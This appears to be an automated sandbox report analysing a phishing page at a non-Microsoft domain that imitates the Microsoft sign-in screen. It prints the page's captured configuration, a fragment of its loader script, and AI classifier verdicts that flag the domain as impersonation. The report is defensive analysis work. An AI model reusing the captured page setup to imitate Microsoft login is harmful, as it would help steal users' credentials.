$Config={"iMaxStackForKnockoutAsyncComponents":10000,"fShowButtons":true,"urlCdn":"https://e6f0455a-569ab540.thntoronto.com/shared/1.0/","urlDefaultFavicon":"https://e6f0455a-569ab540.thntoronto.com/shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico","urlPost":"/login.srf?username=asasd%40asassda.com\u0026client-request-id=b5316d5d-2648-450d-8987-ec57c28bc2f7\u0026sso_reload=True","iPawnIcon":0,"sPOST_Username":"","sFTName":"flowToken","fEnableOneDSClientTelemetry":true,"dynamicTenantBranding":null,"staticTenantBranding":null,"oAppCobranding":{},"iBackgroundImage":2,"fApplicationInsightsEnabled":false,"iApplicationInsightsEnabledPercentage":0,"urlSetDebugMode":"https://docs2preview.thntoronto.com/common/debugmode","fEnableCssAnimation":true,"fAllowGrayOutLightBox":true,"fUseMsaSessionState":true,"fIsRemoteNGCSupported":true,"desktopSsoConfig":{"isEdgeAnaheimAllowed":true,"iwaEndpointUrlFormat":"https://397988c3-569ab540.thntoronto.com/{0}/winauth/sso?client-request-id=b5316d5d-2648-450d-8987-ec57c28bc2f7","iwaSsoProbeUrlFormat":"https://397988c3-569ab540.thntoronto.com/{0}/winauth/ssoprobe?client-request-id=b5316d5d-2648-450d-8987-ec57c28bc2f7","iwaIFrameUrlFormat":"https://397988c3-569ab540.thntoronto.com/{0}/winauth/iframe?client-request-id=b5316d5d-2648-450d-8987-ec57c28bc2f7\u0026isAdalRequest=False","iwaRequestTimeoutInMs":10000,"startDesktopSsoOnPageLoad":false,"progressAnimationTimeout":10000,"isEdgeAllowed":false,"minDssoEdgeVersion":"17","isSafariAllowed":true,"redirectUri":"","isIEAllowedForSsoProbe":true,"edgeRedirectUri":"https://397988c3-569ab540.thntoronto.com/common/winauth/sso/edgeredirect?client-request-id=b5316d5d-2648-450d-8987-ec57c28bc2f7\u0026origin=login.microsoftonline.com\u0026is_redirected=1","isFlowTokenPassedInEdge":true},"iSessionPullType":2,"fUseSameSite":true,"isGlobalTenant":true,"uiflavor":1001,"fOfflineAccountVisible":false,"fEnableUserStateFix":true,"fShowAccessPassPeek":true,"fUpdateSessionPollingLogic":true,"fEnableShowPickerCredObservable":true,"fFetchSessionsSkipDsso":true,"fUseNonMicrosoftDefaultBrandingForCiam":true,"fRemoveCustomCss":true,"fFixUICrashForApiRequestHandler":true,"fShowUpdatedKoreanPrivacyFooter":true,"fUsePostCssHotfix":true,"fFixUserFlowBranding":true,"fEnablePasskeyNullFix":true,"fEnableRefreshCookiesFix":true,"scid":2001,"hpgact":2101,"hpgid":6,"apiCanary":"PAQABDgEAAADW6jl31mB3T7ugrWTT8pFe-bLk9gw60axKAHIEZHsyJZRKkjQMFU55E9Vrf4k4MfxzDZfE77afuA2Kh0sY-VDwXQF_GrvrrC8jVZvpTYbbxQtEzF7xxK2pX_oHzRxZ4nxBy9STO7BmVzDopCVq7e2uzHqEo-0pslE2sVD5LQuXojre1O89par9j7ogosH3oefHRbvMrh9Wd-kaYft5uYH0pTEVwXAzBbz2DXatuuRPbCAA","canary":"ghn4MKmIv3LGKvU4UJYVlfMk6idoBWyWslgvJszTt54=9:1:CANARY:0OSy7Qxx2X1NYYw2QMt+p4StugxnpafsDzrpfRqTyg0=","sCanaryTokenName":"canary","fSkipRenderingNewCanaryToken":false,"fEnableNewCsrfProtection":true,"correlationId":"b5316d5d-2648-450d-8987-ec57c28bc2f7","sessionId":"51617fbe-0d48-4a5d-ac23-dfaf98239000","locale":{"mkt":"en-US","lcid":1033},"slMaxRetry":2,"slReportFailure":true,"strings":{"desktopsso":{"authenticatingmessage":"Trying to sign you in"}},"enums":{"ClientMetricsModes":{"None":0,"SubmitOnPost":1,"SubmitOnRedirect":2,"InstrumentPlt":4}},"urls":{"instr":{"pageload":"https://docs2preview.thntoronto.com/common/instrumentation/reportpageload","dssostatus":"https://docs2preview.thntoronto.com/common/instrumentation/dssostatus"}},"browser":{"ltr":1,"Chrome":1,"_Win":1,"_M117":1,"_D0":1,"Full":1,"Win81":1,"RE_WebKit":1,"b":{"name":"Chrome","major":117,"minor":0},"os":{"name":"Windows","version":"10.0"},"V":"117.0"},"watson":{"url":"/common/handlers/watson","bundle":"https://e6f0455a-569ab540.thntoronto.com/ests/2.1/content/cdnbundles/watson.min_q5ptmu8aniymd4ftuqdkda2.js","sbundle":"https://e6f0455a-569ab540.thntoronto.com/ests/2.1/content/cdnbundles/watsonsupportwithjquery.3.5.min_dc940oomzau4rsu8qesnvg2.js","fbundle":"https://e6f0455a-569ab540.thntoronto.com/ests/2.1/content/cdnbundles/frameworksupport.min_oadrnc13magb009k4d20lg2. |
| URL: https://docs2preview.thntoronto.com/?username=asasd%40asassda.com Model: Joe Sandbox AI | {
"brands": [
"Microsoft"
]
} |
|
| URL: https://docs2preview.thntoronto.com/?username=asas... Model: Joe Sandbox AI | ```json
{
"risk_score": 2,
"reasoning": "The script includes moderate-risk indicators such as aggressive DOM manipulation and error reporting to third-party domains. However, there are no high-risk behaviors like dynamic code execution or data exfiltration. The script appears to be part of a debugging or logging framework, which reduces the risk score."
} |
//<![CDATA[
!function(){var e=window,r=e.$Debug=e.$Debug||{},t=e.$Config||{};if(!r.appendLog){var n=[],o=0;r.appendLog=function(e){var r=t.maxDebugLog||25,i=(new Date).toUTCString()+":"+e;n.push(o+":"+i),n.length>r&&n.shift(),o++},r.getLogs=function(){return n}}}(),function(){function e(e,r){function t(i){var a=e[i];if(i<n-1){return void(o.r[a]?t(i+1):o.when(a,function(){t(i+1)}))}r(a)}var n=e.length;t(0)}function r(e,r,i){function a(){var e=!!s.method,o=e?s.method:i[0],a=s.extraArgs||[],u=n.$WebWatson;try{
var c=t(i,!e);if(a&&a.length>0){for(var d=a.length,l=0;l<d;l++){c.push(a[l])}}o.apply(r,c)}catch(e){return void(u&&u.submitFromException&&u.submitFromException(e))}}var s=o.r&&o.r[e];return r=r||this,s&&(s.skipTimeout?a():n.setTimeout(a,0)),s}function t(e,r){return Array.prototype.slice.call(e,r?1:0)}var n=window;n.$Do||(n.$Do={"q":[],"r":[],"removeItems":[],"lock":0,"o":[]});var o=n.$Do;o.when=function(t,n){function i(e){r(e,a,s)||o.q.push({"id":e,"c":a,"a":s})}var a=0,s=[],u=1;"function"==typeof n||(a=n,
u=2);for(var c=u;c<arguments.length;c++){s.push(arguments[c])}t instanceof Array?e(t,i):i(t)},o.register=function(e,t,n){if(!o.r[e]){o.o.push(e);var i={};if(t&&(i.method=t),n&&(i.skipTimeout=n),arguments&&arguments.length>3){i.extraArgs=[];for(var a=3;a<arguments.length;a++){i.extraArgs.push(arguments[a])}}o.r[e]=i,o.lock++;try{for(var s=0;s<o.q.length;s++){var u=o.q[s];u.id==e&&r(e,u.c,u.a)&&o.removeItems.push(u)}}catch(e){throw e}finally{if(0===--o.lock){for(var c=0;c<o.removeItems.length;c++){
for(var d=o.removeItems[c],l=0;l<o.q.length;l++){if(o.q[l]===d){o.q.splice(l,1);break}}}o.removeItems=[]}}}},o.unregister=function(e){o.r[e]&&delete o.r[e]}}(),function(e,r){function t(){if(!a){if(!r.body){return void setTimeout(t)}a=!0,e.$Do.register("doc.ready",0,!0)}}function n(){if(!s){if(!r.body){return void setTimeout(n)}t(),s=!0,e.$Do.register("doc.load",0,!0),i()}}function o(e){(r.addEventListener||"load"===e.type||"complete"===r.readyState)&&t()}function i(){
r.addEventListener?(r.removeEventListener("DOMContentLoaded",o,!1),e.removeEventListener("load",n,!1)):r.attachEvent&&(r.detachEvent("onreadystatechange",o),e.detachEvent("onload",n))}var a=!1,s=!1;if("complete"===r.readyState){return void setTimeout(n)}!function(){r.addEventListener?(r.addEventListener("DOMContentLoaded",o,!1),e.addEventListener("load",n,!1)):r.attachEvent&&(r.attachEvent("onreadystatechange",o),e.attachEvent("onload",n))}()}(window,document),function(){function e(){
return f.$Config||f.ServerData||{}}function r(e,r){var t=f.$Debug;t&&t.appendLog&&(r&&(e+=" '"+(r.src||r.href||"")+"'",e+=", id:"+(r.id||""),e+=", async:"+(r.async||""),e+=", defer:"+(r.defer||"")),t.appendLog(e))}function t(){var e=f.$B;if(void 0===d){if(e){d=e.IE}else{var r=f.navigator.userAgent;d=-1!==r.indexOf("MSIE ")||-1!==r.indexOf("Trident/")}}return d}function n(){var e=f.$B;if(void 0===l){if(e){l=e.RE_Edge}else{var r=f.navigator.userAgent;l=-1!==r.indexOf("Edge")}}return l}function o(e){
var r=e.indexOf("?"),t=r>-1?r:e.length,n=e.lastIndexOf(".",t);return e.substring(n,n+h.length).toLowerCase()===h}function i(){var r=e();return(r.loader||{}).slReportFailure||r.slReportFailure||!1}function a(){return(e().loader||{}).redirectToErrorPageOnLoadFailure||!1}function s(){return(e().loader||{}).logByThrowing||!1}function u(e){if(!t()&&!n()){return!1}var r=e.src||e.href||"";if(!r){return!0}if(o(r)){var i,a,s;try{i=e.sheet,a=i&&i.cssRules,s=!1}catch(e){s=!0}if(i&&!a&&s){return!0}
if(i&&a&&0===a.length){return!0}}return!1}function c(){function t(e){g.getElementsByTagName("head")[0].appendChild(e)}function n(e,r,t,n){var u=null;return u=o(e)?i(e):"script"===n.toLowerCase()?a(e):s(e,n),r&&(u.id=r),"function"==typeof u.setAttribute&&(u.setAttribute("crossorigin","anonymous"),t&&"string"==typeof t&&u.setAttribute("name","")),u}function i(e){var r=g.createElement("link");return r.rel="stylesheet",r.type="text/css",r.href=e,r}function a(e){
var r=g.createElement("script"),t=g.querySelector("s |
| URL: https://docs2preview.thntoronto.com/?username=asasd%40asassda.com Model: Joe Sandbox AI | ```json{ "legit_domain": "microsoft.com", "classification": "wellknown", "reasons": [ "The brand 'Microsoft' is classified as 'wellknown'.", "The URL 'docs2preview.thntoronto.com' does not match the legitimate domain 'microsoft.com'.", "The domain 'thntoronto.com' does not appear to be associated with Microsoft.", "The use of a subdomain 'docs2preview' could be an attempt to mimic Microsoft's legitimate services like 'docs.microsoft.com'.", "The domain 'thntoronto.com' is not a recognized Microsoft domain, which raises suspicion." ], "riskscore": 8}
Google indexed: False |
URL: docs2preview.thntoronto.com
Brands: Microsoft
Input Fields: unknown |
| URL: https://docs2preview.thntoronto.com/?username=asasd%40asassda.com&sso_reload=true Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "Sign in",
"prominent_button_name": "Next",
"text_input_field_labels": [
"asasd@asassda.com"
],
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
 |
| URL: https://docs2preview.thntoronto.com/?username=asasd%40asassda.com&sso_reload=true Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "Sign in",
"prominent_button_name": "unknown",
"text_input_field_labels": [
"aaassd@esasda.com",
"No account? Create one.",
"Can't access your account?"
],
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
 |
| URL: https://docs2preview.thntoronto.com/?username=asasd%40asassda.com&sso_reload=true Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "Sign in",
"prominent_button_name": "Next",
"text_input_field_labels": [
"asasd@asassda.com"
],
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
 |
| URL: https://docs2preview.thntoronto.com/?username=asasd%40asassda.com&sso_reload=true Model: Joe Sandbox AI | {
"brands": "unknown"
} |
|
| URL: https://docs2preview.thntoronto.com/?username=asasd%40asassda.com&sso_reload=true Model: Joe Sandbox AI | {
"brands": [
"Microsoft"
]
} |
|
| URL: https://docs2preview.thntoronto.com/?username=asasd%40asassda.com&sso_reload=true Model: Joe Sandbox AI | {
"brands": [
"Microsoft"
]
} |
|
| URL: https://docs2preview.thntoronto.com/?username=asasd%40asassda.com&sso_reload=true Model: Joe Sandbox AI | ```json{ "legit_domain": "microsoft.com", "classification": "wellknown", "reasons": [ "The brand 'Microsoft' is classified as 'wellknown'.", "The URL 'docs2preview.thntoronto.com' does not match the legitimate domain 'microsoft.com'.", "The domain 'thntoronto.com' is not associated with Microsoft.", "The presence of 'docs2preview' as a subdomain is suspicious and not typically associated with Microsoft's legitimate services.", "The URL does not contain any direct reference to Microsoft, which is a red flag for phishing." ], "riskscore": 8}
Google indexed: False |
URL: docs2preview.thntoronto.com
Brands: Microsoft
Input Fields: asasd@asassda.com |
| URL: https://docs2preview.thntoronto.com/?username=asasd%40asassda.com&sso_reload=true Model: Joe Sandbox AI | ```json{ "legit_domain": "microsoft.com", "classification": "wellknown", "reasons": [ "The brand 'Microsoft' is well-known and typically associated with the domain 'microsoft.com'.", "The URL 'docs2preview.thntoronto.com' does not match the legitimate domain 'microsoft.com'.", "The domain 'thntoronto.com' does not appear to be associated with Microsoft.", "The presence of 'docs2preview' as a subdomain could be an attempt to mimic Microsoft's legitimate services like 'docs.microsoft.com'.", "The domain 'thntoronto.com' is not a recognized Microsoft domain and could be a phishing attempt." ], "riskscore": 8}
Google indexed: False |
URL: docs2preview.thntoronto.com
Brands: Microsoft
Input Fields: asasd@asassda.com |
| URL: https://docs2preview.thntoronto.com/?username=asasd%40asassda.com&sso_reload=true Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "We couldn't find an account with that username. Try another, or get a new Microsoft account.",
"prominent_button_name": "Next",
"text_input_field_labels": ["asasd@asisda.com"],
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
 |
| URL: https://docs2preview.thntoronto.com/?username=asasd%40asassda.com&sso_reload=true Model: Joe Sandbox AI | {
"brands": [
"Microsoft"
]
} |
|
Edit tour
Acrobat.exe (PID: 1104 cmdline: 
AcroCEF.exe (PID: 4012 cmdline: 
chrome.exe (PID: 7480 cmdline: 
Key Decision
Richest Path
Thread / callback creation
Lower opacity -> Library Node